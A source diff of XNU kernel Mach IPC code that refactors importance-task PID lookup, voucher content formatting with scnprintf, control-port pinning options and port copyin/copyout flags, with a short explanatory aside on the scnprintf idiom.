index bc3980f2dfe8f74277399011a6076022ad14ba3a..2c76a72811965fd93790f2abb5811e06d5595d5f 100644 (file)
@@ -1997,6 +1997,16 @@ task_importance_update_owner_info(task_t task)
 }
 #endif
 
+static int
+task_importance_task_get_pid(ipc_importance_task_t iit)
+{
+#if DEVELOPMENT || DEBUG
+       return (int)iit->iit_bsd_pid;
+#else
+       return task_pid(iit->iit_task);
+#endif
+}
+
 /*
  *     Routine:        ipc_importance_reset_locked
  *     Purpose:
@@ -2034,13 +2044,6 @@ ipc_importance_reset_locked(ipc_importance_task_t task_imp, boolean_t donor)
        task_imp->iit_legacy_externdrop = 0;
        after_donor = ipc_importance_task_is_donor(task_imp);
 
-#if DEVELOPMENT || DEBUG
-       if (task_imp->iit_assertcnt > 0 && task_imp->iit_live_donor) {
-               printf("Live donor task %s[%d] still has %d importance assertions after reset\n",
-                   task_imp->iit_procname, task_imp->iit_bsd_pid, task_imp->iit_assertcnt);
-       }
-#endif
-
        /* propagate a downstream drop if there was a change in donor status */
        if (after_donor != before_donor) {
                ipc_importance_task_propagate_assertion_locked(task_imp, IIT_UPDATE_DROP, FALSE);
@@ -3260,7 +3263,8 @@ ipc_importance_receive(
                 * will trigger the probe in ipc_importance_task_externalize_assertion()
                 * above and have impresult==1 here.
                 */
-               DTRACE_BOOST5(receive_boost, task_t, task_self, int, task_pid(task_self), int, sender_pid, int, 1, int, task_self->task_imp_base->iit_assertcnt);
+               DTRACE_BOOST5(receive_boost, task_t, task_self, int, task_pid(task_self),
+                   int, sender_pid, int, 1, int, task_self->task_imp_base->iit_assertcnt);
        }
 #endif /* IMPORTANCE_TRACE */
 }
@@ -3587,59 +3591,61 @@ ipc_importance_extract_content(
        mach_voucher_attr_content_t                     out_content,
        mach_voucher_attr_content_size_t                *in_out_content_size)
 {
-       mach_voucher_attr_content_size_t size = 0;
        ipc_importance_elem_t elem;
        unsigned int i;
 
+       char *buf = (char *)out_content;
+       mach_voucher_attr_content_size_t size = *in_out_content_size;
+       mach_voucher_attr_content_size_t pos = 0;
+       __unused int pid;
+
        IMPORTANCE_ASSERT_MANAGER(manager);
        IMPORTANCE_ASSERT_KEY(key);
 
        /* the first non-default value provides the data */
-       for (i = 0; i < value_count && *in_out_content_size > 0; i++) {
+       for (i = 0; i < value_count; i++) {
                elem = (ipc_importance_elem_t)values[i];
                if (IIE_NULL == elem) {
                        continue;
                }
 
-               snprintf((char *)out_content, *in_out_content_size, "Importance for pid ");
-               size = (mach_voucher_attr_content_size_t)strlen((char *)out_content);
+               pos += scnprintf(buf + pos, size - pos, "Importance for ");
 
                for (;;) {
                        ipc_importance_inherit_t inherit = III_NULL;
                        ipc_importance_task_t task_imp;
-                       task_t task;
-                       int t_pid;
 
                        if (IIE_TYPE_TASK == IIE_TYPE(elem)) {
                                task_imp = (ipc_importance_task_t)elem;
-                               task = task_imp->iit_task;
-                               t_pid = (TASK_NULL != task) ?
-                                   task_pid(task) : -1;
-                               snprintf((char *)out_content + size, *in_out_content_size - size, "%d", t_pid);
                        } else {
                                inherit = (ipc_importance_inherit_t)elem;
                                task_imp = inherit->iii_to_task;
-                               task = task_imp->iit_task;
-                               t_pid = (TASK_NULL != task) ?
-                                   task_pid(task) : -1;
-                               snprintf((char *)out_content + size, *in_out_content_size - size,
-                                   "%d (%d of %d boosts) %s from pid ", t_pid,
-                                   III_EXTERN(inherit), inherit->iii_externcnt,
-                                   (inherit->iii_donating) ? "donated" : "linked");
                        }
-
-                       size = (mach_voucher_attr_content_size_t)strlen((char *)out_content);
+#if DEVELOPMENT || DEBUG
+                       pos += scnprintf(buf + pos, size - pos, "%s[%d]",
+                           task_imp->iit_procname, task_imp->iit_bsd_pid);
+#else
+                       ipc_importance_lock();
+                       pid = task_importance_task_get_pid(task_imp);
+                       ipc_importance_unlock();
+                       pos += scnprintf(buf + pos, size - pos, "pid %d", pid);
+#endif /* DEVELOPMENT || DEBUG */
 
                        if (III_NULL == inherit) {
                                break;
                        }
-
+                       pos += scnprintf(buf + pos, size - pos,
+                           " (%d of %d boosts) %s from ",
+                           III_EXTERN(inherit), inherit->iii_externcnt,
+                           (inherit->iii_donating) ? "donated" : "linked");
                        elem = inherit->iii_from_elem;
                }
-               size++; /* account for NULL */
+
+               pos++; /* account for terminating \0 */
+               break;
        }
        *out_command = MACH_VOUCHER_ATTR_NOOP; /* cannot be used to regenerate value */
-       *in_out_content_size = size;
+       *in_out_content_size = pos;
        return KERN_SUCCESS;
 }
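
The rewrite above leans on scnprintf() returning the number of characters actually written (rather than the would-be length that snprintf() reports), so the running offset can be accumulated without ever passing the buffer size; a minimal hedged sketch of the idiom with made-up values:

static void
example_scnprintf_accumulate(void)
{
	char buf[64];
	const size_t size = sizeof(buf);
	size_t pos = 0;

	/* each call returns what was actually written, so pos stays within the buffer */
	pos += scnprintf(buf + pos, size - pos, "Importance for ");
	pos += scnprintf(buf + pos, size - pos, "pid %d", 123);
	pos += scnprintf(buf + pos, size - pos, " (%d of %d boosts)", 1, 4);
	pos++;          /* mirror the content-size accounting above: count the terminating NUL */
}
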
 
@@ -3863,14 +3869,7 @@ task_importance_list_pids(task_t task, int flags, char *pid_list, unsigned int m
                target_pid = -1;
 
                if (temp_inherit->iii_donating) {
-#if DEVELOPMENT || DEBUG
-                       target_pid = temp_inherit->iii_to_task->iit_bsd_pid;
-#else
-                       temp_task = temp_inherit->iii_to_task->iit_task;
-                       if (temp_task != TASK_NULL) {
-                               target_pid = task_pid(temp_task);
-                       }
-#endif
+                       target_pid = task_importance_task_get_pid(temp_inherit->iii_to_task);
                }
 
                if (target_pid != -1 && previous_pid != target_pid) {
@@ -3898,19 +3897,12 @@ task_importance_list_pids(task_t task, int flags, char *pid_list, unsigned int m
                        continue;
                }
 
-               if (IIE_TYPE_TASK == IIE_TYPE(elem) &&
-                   (((ipc_importance_task_t)elem)->iit_task != TASK_NULL)) {
-                       target_pid = task_pid(((ipc_importance_task_t)elem)->iit_task);
+               if (IIE_TYPE_TASK == IIE_TYPE(elem)) {
+                       ipc_importance_task_t temp_iit = (ipc_importance_task_t)elem;
+                       target_pid = task_importance_task_get_pid(temp_iit);
                } else {
                        temp_inherit = (ipc_importance_inherit_t)elem;
-#if DEVELOPMENT || DEBUG
-                       target_pid = temp_inherit->iii_to_task->iit_bsd_pid;
-#else
-                       temp_task = temp_inherit->iii_to_task->iit_task;
-                       if (temp_task != TASK_NULL) {
-                               target_pid = task_pid(temp_task);
-                       }
-#endif
+                       target_pid = task_importance_task_get_pid(temp_inherit->iii_to_task);
                }
 
                if (target_pid != -1 && previous_pid != target_pid) {
index b6ff1fc9efaeabd5401d2946cb815c7e5f12587c..b2a97a89c20aded7ab4c8b0f03b2388afa5dc400 100644 (file)
 
 #include <mach/machine/ndr_def.h>   /* NDR_record */
 
-#define IPC_KERNEL_MAP_SIZE      (1024 * 1024)
+#define IPC_KERNEL_MAP_SIZE      (CONFIG_IPC_KERNEL_MAP_SIZE * 1024 * 1024)
 SECURITY_READ_ONLY_LATE(vm_map_t) ipc_kernel_map;
 
 /* values to limit physical copy out-of-line memory descriptors */
@@ -125,6 +125,19 @@ const vm_size_t ipc_kmsg_max_vm_space = ((IPC_KERNEL_COPY_MAP_SIZE * 7) / 8);
 #define IPC_KMSG_MAX_SPACE (64 * 1024 * 1024) /* keep in sync with COPYSIZELIMIT_PANIC */
 const vm_size_t ipc_kmsg_max_body_space = ((IPC_KMSG_MAX_SPACE * 3) / 4 - MAX_TRAILER_SIZE);
 
+#if XNU_TARGET_OS_OSX
+#define IPC_CONTROL_PORT_OPTIONS_DEFAULT IPC_CONTROL_PORT_OPTIONS_NONE
+#else
+#define IPC_CONTROL_PORT_OPTIONS_DEFAULT (IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_HARD | IPC_CONTROL_PORT_OPTIONS_PINNED_SOFT)
+#endif
+
+TUNABLE(ipc_control_port_options_t, ipc_control_port_options,
+    "ipc_control_port_options", IPC_CONTROL_PORT_OPTIONS_DEFAULT);
+
+SECURITY_READ_ONLY_LATE(bool) pinned_control_port_enabled;
+SECURITY_READ_ONLY_LATE(bool) immovable_control_port_enabled;
+
+
 LCK_GRP_DECLARE(ipc_lck_grp, "ipc");
 LCK_ATTR_DECLARE(ipc_lck_attr, 0, 0);
 
@@ -163,6 +176,15 @@ ipc_init(void)
        arcade_init();
 #endif
 
+       pinned_control_port_enabled    = !!(ipc_control_port_options & (IPC_CONTROL_PORT_OPTIONS_PINNED_SOFT | IPC_CONTROL_PORT_OPTIONS_PINNED_HARD));
+       immovable_control_port_enabled = !!(ipc_control_port_options & (IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_SOFT | IPC_CONTROL_PORT_OPTIONS_IMMOVABLE_HARD));
+
+       if (pinned_control_port_enabled && !immovable_control_port_enabled) {
+               kprintf("Invalid ipc_control_port_options boot-arg: pinned control port cannot be enabled without immovability enforcement. Ignoring pinning boot-arg.");
+               pinned_control_port_enabled = false;
+               ipc_control_port_options &= ~(IPC_CONTROL_PORT_OPTIONS_PINNED_SOFT | IPC_CONTROL_PORT_OPTIONS_PINNED_HARD);
+       }
+
        kr = kmem_suballoc(kernel_map, &min, IPC_KERNEL_MAP_SIZE,
            TRUE,
            (VM_FLAGS_ANYWHERE),
index 04ec259aa1be447189f2f1c2b77c6039a24d0bea..8b219581df51e6bf2079801eb2b0f039229ca96a 100644 (file)
@@ -90,7 +90,6 @@
 #include <kern/thread.h>
 #include <kern/sched_prim.h>
 #include <kern/misc_protos.h>
-#include <kern/counters.h>
 #include <kern/cpu_data.h>
 #include <kern/policy_internal.h>
 #include <kern/mach_filter.h>
@@ -2619,7 +2618,7 @@ ipc_kmsg_allow_immovable_send(
         *      rights in the message body to succeed
         */
        if (IO_VALID(object) && io_is_kobject(object)) {
-               kmsg->ikm_flags |= IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND;
+               kmsg->ikm_flags |= IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND;
        }
 }
 
@@ -2992,7 +2991,7 @@ ipc_kmsg_copyin_header(
                 */
                if (reply_entry != IE_NULL) {
                        kr = ipc_right_copyin(space, reply_name, reply_entry,
-                           reply_type, IPC_RIGHT_COPYIN_FLAGS_DEADOK,
+                           reply_type, IPC_OBJECT_COPYIN_FLAGS_DEADOK,
                            &reply_port, &reply_soright,
                            &release_port, &assertcnt, 0, NULL);
                        assert(assertcnt == 0);
@@ -3093,8 +3092,8 @@ ipc_kmsg_copyin_header(
                         *      copyin the destination.
                         */
                        kr = ipc_right_copyin(space, dest_name, dest_entry,
-                           dest_type, (IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND |
-                           IPC_RIGHT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE),
+                           dest_type, (IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND |
+                           IPC_OBJECT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE),
                            &dest_port, &dest_soright,
                            &release_port, &assertcnt, 0, NULL);
                        assert(assertcnt == 0);
@@ -3110,7 +3109,7 @@ ipc_kmsg_copyin_header(
                         */
                        if (MACH_PORT_VALID(reply_name)) {
                                kr = ipc_right_copyin(space, reply_name, reply_entry,
-                                   reply_type, IPC_RIGHT_COPYIN_FLAGS_DEADOK,
+                                   reply_type, IPC_OBJECT_COPYIN_FLAGS_DEADOK,
                                    &reply_port, &reply_soright,
                                    &release_port, &assertcnt, 0, NULL);
                                assert(assertcnt == 0);
@@ -3127,7 +3126,7 @@ ipc_kmsg_copyin_header(
                 */
                if (IE_NULL != voucher_entry) {
                        kr = ipc_right_copyin(space, voucher_name, voucher_entry,
-                           voucher_type, IPC_RIGHT_COPYIN_FLAGS_NONE,
+                           voucher_type, IPC_OBJECT_COPYIN_FLAGS_NONE,
                            (ipc_object_t *)&voucher_port,
                            &voucher_soright,
                            &voucher_release_port,
@@ -4605,6 +4604,7 @@ ipc_kmsg_copyout_header(
 
                uint32_t entries_held = 0;
                boolean_t need_write_lock = FALSE;
+               ipc_object_copyout_flags_t reply_copyout_options = IPC_OBJECT_COPYOUT_FLAGS_NONE;
                kern_return_t kr;
 
                /*
@@ -4625,6 +4625,7 @@ ipc_kmsg_copyout_header(
                }
 
                if (need_write_lock) {
+handle_reply_again:
                        is_write_lock(space);
 
                        while (entries_held) {
@@ -4649,32 +4650,48 @@ ipc_kmsg_copyout_header(
 
                        /* Handle reply port. */
                        if (IP_VALID(reply)) {
+                               ipc_port_t reply_subst = IP_NULL;
                                ipc_entry_t entry;
 
+                               ip_lock(reply);
+
+                               /* Is the reply port still active and allowed to be copied out? */
+                               if (!ip_active(reply) ||
+                                   !ip_label_check(space, reply, reply_type,
+                                   &reply_copyout_options, &reply_subst)) {
+                                       /* clear the context value */
+                                       reply->ip_reply_context = 0;
+                                       ip_unlock(reply);
+
+                                       assert(reply_subst == IP_NULL);
+                                       release_reply_port = reply;
+                                       reply = IP_DEAD;
+                                       reply_name = MACH_PORT_DEAD;
+                                       goto done_with_reply;
+                               }
+
+                               /* is the kolabel requesting a substitution */
+                               if (reply_subst != IP_NULL) {
+                                       /*
+                                        * port is unlocked, its right consumed
+                                        * space is unlocked
+                                        */
+                                       assert(reply_type == MACH_MSG_TYPE_PORT_SEND);
+                                       msg->msgh_local_port = reply = reply_subst;
+                                       goto handle_reply_again;
+                               }
+
+
                                /* Is there already an entry we can use? */
                                if ((reply_type != MACH_MSG_TYPE_PORT_SEND_ONCE) &&
                                    ipc_right_reverse(space, ip_to_object(reply), &reply_name, &entry)) {
-                                       /* reply port is locked and active */
                                        assert(entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE);
                                } else {
-                                       ip_lock(reply);
-                                       /* Is the reply port still active and allowed to be copied out? */
-                                       if (!ip_active(reply) || !ip_label_check(space, reply, reply_type)) {
-                                               /* clear the context value */
-                                               reply->ip_reply_context = 0;
-                                               ip_unlock(reply);
-
-                                               release_reply_port = reply;
-                                               reply = IP_DEAD;
-                                               reply_name = MACH_PORT_DEAD;
-                                               goto done_with_reply;
-                                       }
-
                                        /* claim a held entry for the reply port */
                                        assert(entries_held > 0);
                                        entries_held--;
                                        ipc_entry_claim(space, &reply_name, &entry);
-                                       assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE);
+                                       assert(!ipc_right_inuse(entry));
                                        assert(entry->ie_object == IO_NULL);
                                        entry->ie_object = ip_to_object(reply);
                                }
@@ -4711,7 +4728,8 @@ ipc_kmsg_copyout_header(
                                }
 
                                kr = ipc_right_copyout(space, reply_name, entry,
-                                   reply_type, NULL, NULL, ip_to_object(reply));
+                                   reply_type, IPC_OBJECT_COPYOUT_FLAGS_NONE, NULL, NULL,
+                                   ip_to_object(reply));
                                assert(kr == KERN_SUCCESS);
                                /* reply port is unlocked */
                        } else {
@@ -4738,25 +4756,25 @@ done_with_reply:
                                if ((option & MACH_RCV_VOUCHER) != 0) {
                                        ipc_entry_t entry;
 
+                                       ip_lock(voucher);
+
                                        if (ipc_right_reverse(space, ip_to_object(voucher),
                                            &voucher_name, &entry)) {
-                                               /* voucher port locked */
                                                assert(entry->ie_bits & MACH_PORT_TYPE_SEND);
                                        } else {
                                                assert(entries_held > 0);
                                                entries_held--;
                                                ipc_entry_claim(space, &voucher_name, &entry);
-                                               assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE);
+                                               assert(!ipc_right_inuse(entry));
                                                assert(entry->ie_object == IO_NULL);
                                                entry->ie_object = ip_to_object(voucher);
-                                               ip_lock(voucher);
                                        }
                                        /* space is locked and active */
-                                       require_ip_active(voucher);
+
                                        assert(ip_kotype(voucher) == IKOT_VOUCHER);
                                        kr = ipc_right_copyout(space, voucher_name, entry,
-                                           MACH_MSG_TYPE_MOVE_SEND, NULL, NULL,
-                                           ip_to_object(voucher));
+                                           MACH_MSG_TYPE_MOVE_SEND, IPC_OBJECT_COPYOUT_FLAGS_NONE,
+                                           NULL, NULL, ip_to_object(voucher));
                                        /* voucher port is unlocked */
                                } else {
                                        voucher_type = MACH_MSGH_BITS_ZERO;
@@ -4931,8 +4949,7 @@ done_with_voucher:
  *             MACH_MSG_IPC_KERNEL     Kernel resource shortage.
  *                     (Name is MACH_PORT_NULL.)
  */
-
-mach_msg_return_t
+static mach_msg_return_t
 ipc_kmsg_copyout_object(
        ipc_space_t             space,
        ipc_object_t            object,
@@ -4948,10 +4965,9 @@ ipc_kmsg_copyout_object(
                return MACH_MSG_SUCCESS;
        }
 
-       kr = ipc_object_copyout(space, object, msgt_name, context, guard_flags, namep);
+       kr = ipc_object_copyout(space, object, msgt_name, IPC_OBJECT_COPYOUT_FLAGS_NONE,
+           context, guard_flags, namep);
        if (kr != KERN_SUCCESS) {
-               ipc_object_destroy(object, msgt_name);
-
                if (kr == KERN_INVALID_CAPABILITY) {
                        *namep = MACH_PORT_DEAD;
                } else {
@@ -4969,14 +4985,15 @@ ipc_kmsg_copyout_object(
 }
 
 static mach_msg_descriptor_t *
-ipc_kmsg_copyout_port_descriptor(mach_msg_descriptor_t *dsc,
-    mach_msg_descriptor_t *dest_dsc,
-    ipc_space_t space,
-    kern_return_t *mr)
+ipc_kmsg_copyout_port_descriptor(
+       mach_msg_descriptor_t   *dsc,
+       mach_msg_descriptor_t   *dest_dsc,
+       ipc_space_t             space,
+       kern_return_t           *mr)
 {
-       mach_port_t                 port;
-       mach_port_name_t            name;
-       mach_msg_type_name_t                disp;
+       mach_port_t             port;
+       mach_port_name_t        name;
+       mach_msg_type_name_t    disp;
 
        /* Copyout port right carried in the message */
        port = dsc->port.name;
@@ -5005,17 +5022,20 @@ ipc_kmsg_copyout_port_descriptor(mach_msg_descriptor_t *dsc,
        return (mach_msg_descriptor_t *)dest_dsc;
 }
 
-mach_msg_descriptor_t *
-ipc_kmsg_copyout_ool_descriptor(mach_msg_ool_descriptor_t *dsc, mach_msg_descriptor_t *user_dsc, int is_64bit, vm_map_t map, mach_msg_return_t *mr);
-mach_msg_descriptor_t *
-ipc_kmsg_copyout_ool_descriptor(mach_msg_ool_descriptor_t *dsc, mach_msg_descriptor_t *user_dsc, int is_64bit, vm_map_t map, mach_msg_return_t *mr)
+static mach_msg_descriptor_t *
+ipc_kmsg_copyout_ool_descriptor(
+       mach_msg_ool_descriptor_t   *dsc,
+       mach_msg_descriptor_t       *user_dsc,
+       int                         is_64bit,
+       vm_map_t                    map,
+       mach_msg_return_t           *mr)
 {
-       vm_map_copy_t                       copy;
-       vm_map_address_t                    rcv_addr;
-       mach_msg_copy_options_t             copy_options;
-       vm_map_size_t                       size;
+       vm_map_copy_t               copy;
+       vm_map_address_t            rcv_addr;
+       mach_msg_copy_options_t     copy_options;
+       vm_map_size_t               size;
        mach_msg_descriptor_type_t  dsc_type;
-       boolean_t                           misaligned = FALSE;
+       boolean_t                   misaligned = FALSE;
 
        //SKIP_PORT_DESCRIPTORS(saddr, sdsc_count);
 
@@ -5441,20 +5461,24 @@ ipc_kmsg_copyout_body(
        for (i = dsc_count - 1; i >= 0; i--) {
                switch (kern_dsc[i].type.type) {
                case MACH_MSG_PORT_DESCRIPTOR:
-                       user_dsc = ipc_kmsg_copyout_port_descriptor(&kern_dsc[i], user_dsc, space, &mr);
+                       user_dsc = ipc_kmsg_copyout_port_descriptor(&kern_dsc[i],
+                           user_dsc, space, &mr);
                        break;
                case MACH_MSG_OOL_VOLATILE_DESCRIPTOR:
                case MACH_MSG_OOL_DESCRIPTOR:
                        user_dsc = ipc_kmsg_copyout_ool_descriptor(
-                               (mach_msg_ool_descriptor_t *)&kern_dsc[i], user_dsc, is_task_64bit, map, &mr);
+                               (mach_msg_ool_descriptor_t *)&kern_dsc[i],
+                               user_dsc, is_task_64bit, map, &mr);
                        break;
                case MACH_MSG_OOL_PORTS_DESCRIPTOR:
                        user_dsc = ipc_kmsg_copyout_ool_ports_descriptor(
-                               (mach_msg_ool_ports_descriptor_t *)&kern_dsc[i], user_dsc, is_task_64bit, map, space, kmsg, &mr);
+                               (mach_msg_ool_ports_descriptor_t *)&kern_dsc[i],
+                               user_dsc, is_task_64bit, map, space, kmsg, &mr);
                        break;
                case MACH_MSG_GUARDED_PORT_DESCRIPTOR:
                        user_dsc = ipc_kmsg_copyout_guarded_port_descriptor(
-                               (mach_msg_guarded_port_descriptor_t *)&kern_dsc[i], user_dsc, is_task_64bit, kmsg, space, option, &mr);
+                               (mach_msg_guarded_port_descriptor_t *)&kern_dsc[i],
+                               user_dsc, is_task_64bit, kmsg, space, option, &mr);
                        break;
                default: {
                        panic("untyped IPC copyout body: invalid message descriptor");
index dff4370cf010d78f6dc7ae767b4317b6a43bbeeb..fe744639f77816cbc35f0295f619b503aa62ed72 100644 (file)
 #include <ipc/ipc_object.h>
 #include <sys/kdebug.h>
 
-typedef uint16_t ipc_kmsg_flags_t;
-
-#define IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND 0x1       /* Dest port contains an immovable send right */
-
 #if (DEVELOPMENT || DEBUG)
 /* Turn on to keep partial message signatures for better debug */
 #define IKM_PARTIAL_SIG        0
@@ -107,8 +103,6 @@ typedef uint16_t ipc_kmsg_flags_t;
  */
 
 struct ipc_kmsg {
-       mach_msg_size_t            ikm_size;
-       uint32_t                   ikm_ppriority;    /* pthread priority of this kmsg */
        struct ipc_kmsg            *ikm_next;        /* next message on port/discard queue */
        struct ipc_kmsg            *ikm_prev;        /* prev message on port/discard queue */
        union {
@@ -123,12 +117,14 @@ struct ipc_kmsg {
 #if MACH_FLIPC
        struct mach_node           *ikm_node;        /* Originating node - needed for ack */
 #endif
+       mach_msg_size_t            ikm_size;
+       uint32_t                   ikm_ppriority;    /* pthread priority of this kmsg */
 #if IKM_PARTIAL_SIG
        uintptr_t                  ikm_header_sig;   /* sig for just the header */
        uintptr_t                  ikm_headtrail_sig;/* sig for header and trailer */
 #endif
        uintptr_t                  ikm_signature;    /* sig for all kernel-processed data */
-       ipc_kmsg_flags_t           ikm_flags;
+       ipc_object_copyin_flags_t  ikm_flags;
        mach_msg_qos_t             ikm_qos_override; /* qos override on this kmsg */
        mach_msg_filter_id         ikm_filter_policy_id; /* Sandbox-specific policy id used for message filtering */
 };
@@ -334,15 +330,6 @@ extern mach_msg_return_t ipc_kmsg_copyout_header(
        ipc_space_t             space,
        mach_msg_option_t       option);
 
-/* Copyout a port right returning a name */
-extern mach_msg_return_t ipc_kmsg_copyout_object(
-       ipc_space_t             space,
-       ipc_object_t            object,
-       mach_msg_type_name_t    msgt_name,
-       mach_port_context_t     *context,
-       mach_msg_guard_flags_t  *guard_flags,
-       mach_port_name_t        *namep);
-
 /* Copyout the header and body to a user message */
 extern mach_msg_return_t ipc_kmsg_copyout(
        ipc_kmsg_t              kmsg,
index d715828abb4bf794cf44f27266ee8cf89728de42..98ad438bbb186a2cf4f591426a87f14b645e8460 100644 (file)
@@ -75,7 +75,7 @@
 #include <mach/sync_policy.h>
 
 #include <kern/assert.h>
-#include <kern/counters.h>
+#include <kern/counter.h>
 #include <kern/sched_prim.h>
 #include <kern/ipc_kobject.h>
 #include <kern/ipc_mig.h>       /* XXX - for mach_msg_receive_continue */
@@ -188,7 +188,6 @@ imq_reserve_and_lock(ipc_mqueue_t mq, uint64_t *reserved_prepost)
 void
 imq_release_and_unlock(ipc_mqueue_t mq, uint64_t reserved_prepost)
 {
-       assert(imq_held(mq));
        waitq_unlock(&mq->imq_wait_queue);
        waitq_prepost_release_reserve(reserved_prepost);
 }
@@ -592,7 +591,6 @@ ipc_mqueue_send(
 
                if (wresult == THREAD_WAITING) {
                        wresult = thread_block(THREAD_CONTINUE_NULL);
-                       counter(c_ipc_mqueue_send_block++);
                }
 
                /* Call turnstile complete with interlock held */
@@ -678,11 +676,7 @@ ipc_mqueue_override_send(
        if (full_queue_empty) {
                ipc_port_t port = ip_from_mq(mqueue);
                int dst_pid = 0;
-               if (ip_active(port) && !port->ip_tempowner &&
-                   port->ip_receiver_name && port->ip_receiver &&
-                   port->ip_receiver != ipc_space_kernel) {
-                       dst_pid = task_pid(port->ip_receiver->is_task);
-               }
+               dst_pid = ipc_port_get_receiver_task(port, NULL);
        }
 #endif
 }
@@ -704,7 +698,7 @@ ipc_mqueue_release_msgcount(ipc_mqueue_t port_mq, ipc_mqueue_t set_mq)
 {
        struct turnstile *send_turnstile = port_send_turnstile(ip_from_mq(port_mq));
        (void)set_mq;
-       assert(imq_held(port_mq));
+       imq_held(port_mq);
        assert(port_mq->imq_msgcount > 1 || ipc_kmsg_queue_empty(&port_mq->imq_messages));
 
        port_mq->imq_msgcount--;
@@ -1037,10 +1031,6 @@ ipc_mqueue_receive(
        }
 
        if (wresult == THREAD_WAITING) {
-               counter((interruptible == THREAD_ABORTSAFE) ?
-                   c_ipc_mqueue_receive_block_user++ :
-                   c_ipc_mqueue_receive_block_kernel++);
-
                if (self->ith_continuation) {
                        thread_block(ipc_mqueue_receive_continue);
                }
@@ -1488,7 +1478,7 @@ void
 ipc_mqueue_release_peek_ref(ipc_mqueue_t mq)
 {
        assert(!imq_is_set(mq));
-       assert(imq_held(mq));
+       imq_held(mq);
 
        /*
         * clear any preposts this mq may have generated
@@ -1718,7 +1708,7 @@ ipc_mqueue_destroy_locked(ipc_mqueue_t mqueue)
  *             Changes a message queue limit; the maximum number
  *             of messages which may be queued.
  *     Conditions:
- *             Nothing locked.
+ *             Port is locked.
  */
 
 void
index 98ea22434841ea7113420164631642e7d69d5027..47ed2259d1d1dca938f38bf98220e93933cd691a 100644 (file)
@@ -164,7 +164,7 @@ typedef struct ipc_mqueue {
 #define imq_is_valid(mq)        waitq_is_valid(&(mq)->imq_wait_queue)
 
 #define imq_unlock(mq)          waitq_unlock(&(mq)->imq_wait_queue)
-#define imq_held(mq)            waitq_held(&(mq)->imq_wait_queue)
+#define imq_held(mq)            assert(waitq_held(&(mq)->imq_wait_queue))
 #define imq_valid(mq)           waitq_valid(&(mq)->imq_wait_queue)
 
 extern void imq_lock(ipc_mqueue_t mq);
index 5086568f6f989124be8056cbfdb6d67aa52980bd..f65ceff405b2881ff3e5f5c2a3c07d8c1df8a7f5 100644 (file)
@@ -336,7 +336,8 @@ ipc_object_alloc_dead_name(
        }
        /* space is write-locked */
 
-       if (ipc_right_inuse(space, name, entry)) {
+       if (ipc_right_inuse(entry)) {
+               is_write_unlock(space);
                return KERN_NAME_EXISTS;
        }
 
@@ -382,21 +383,11 @@ ipc_object_alloc(
        assert(type != MACH_PORT_TYPE_NONE);
        assert(urefs <= MACH_PORT_UREFS_MAX);
 
-       object = io_alloc(otype);
+       object = io_alloc(otype, Z_WAITOK | Z_ZERO);
        if (object == IO_NULL) {
                return KERN_RESOURCE_SHORTAGE;
        }
 
-       if (otype == IOT_PORT) {
-               ipc_port_t port = ip_object_to_port(object);
-
-               bzero((char *)port, sizeof(*port));
-       } else if (otype == IOT_PORT_SET) {
-               ipc_pset_t pset = ips_object_to_pset(object);
-
-               bzero((char *)pset, sizeof(*pset));
-       }
-
        io_lock_init(object);
        *namep = CAST_MACH_PORT_TO_NAME(object);
        kr = ipc_entry_alloc(space, namep, &entry);
@@ -451,21 +442,11 @@ ipc_object_alloc_name(
        assert(type != MACH_PORT_TYPE_NONE);
        assert(urefs <= MACH_PORT_UREFS_MAX);
 
-       object = io_alloc(otype);
+       object = io_alloc(otype, Z_WAITOK | Z_ZERO);
        if (object == IO_NULL) {
                return KERN_RESOURCE_SHORTAGE;
        }
 
-       if (otype == IOT_PORT) {
-               ipc_port_t port = ip_object_to_port(object);
-
-               bzero((char *)port, sizeof(*port));
-       } else if (otype == IOT_PORT_SET) {
-               ipc_pset_t pset = ips_object_to_pset(object);
-
-               bzero((char *)pset, sizeof(*pset));
-       }
-
        io_lock_init(object);
        kr = ipc_entry_alloc_name(space, name, &entry);
        if (kr != KERN_SUCCESS) {
@@ -474,7 +455,8 @@ ipc_object_alloc_name(
        }
        /* space is write-locked */
 
-       if (ipc_right_inuse(space, name, entry)) {
+       if (ipc_right_inuse(entry)) {
+               is_write_unlock(space);
                io_free(otype, object);
                return KERN_NAME_EXISTS;
        }
@@ -562,13 +544,13 @@ ipc_object_copyin_type(
 
 kern_return_t
 ipc_object_copyin(
-       ipc_space_t             space,
-       mach_port_name_t        name,
-       mach_msg_type_name_t    msgt_name,
-       ipc_object_t            *objectp,
-       mach_port_context_t     context,
-       mach_msg_guard_flags_t  *guard_flags,
-       ipc_kmsg_flags_t        kmsg_flags)
+       ipc_space_t                space,
+       mach_port_name_t           name,
+       mach_msg_type_name_t       msgt_name,
+       ipc_object_t               *objectp,
+       mach_port_context_t        context,
+       mach_msg_guard_flags_t     *guard_flags,
+       ipc_object_copyin_flags_t  copyin_flags)
 {
        ipc_entry_t entry;
        ipc_port_t soright;
@@ -576,11 +558,9 @@ ipc_object_copyin(
        kern_return_t kr;
        int assertcnt = 0;
 
-       ipc_right_copyin_flags_t irc_flags = IPC_RIGHT_COPYIN_FLAGS_DEADOK;
-       if (kmsg_flags & IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND) {
-               irc_flags |= IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND;
-       }
-
+       ipc_object_copyin_flags_t irc_flags = IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND |
+           IPC_OBJECT_COPYIN_FLAGS_SOFT_FAIL_IMMOVABLE_SEND;
+       irc_flags = (copyin_flags & irc_flags) | IPC_OBJECT_COPYIN_FLAGS_DEADOK;
        /*
         *      Could first try a read lock when doing
         *      MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND,
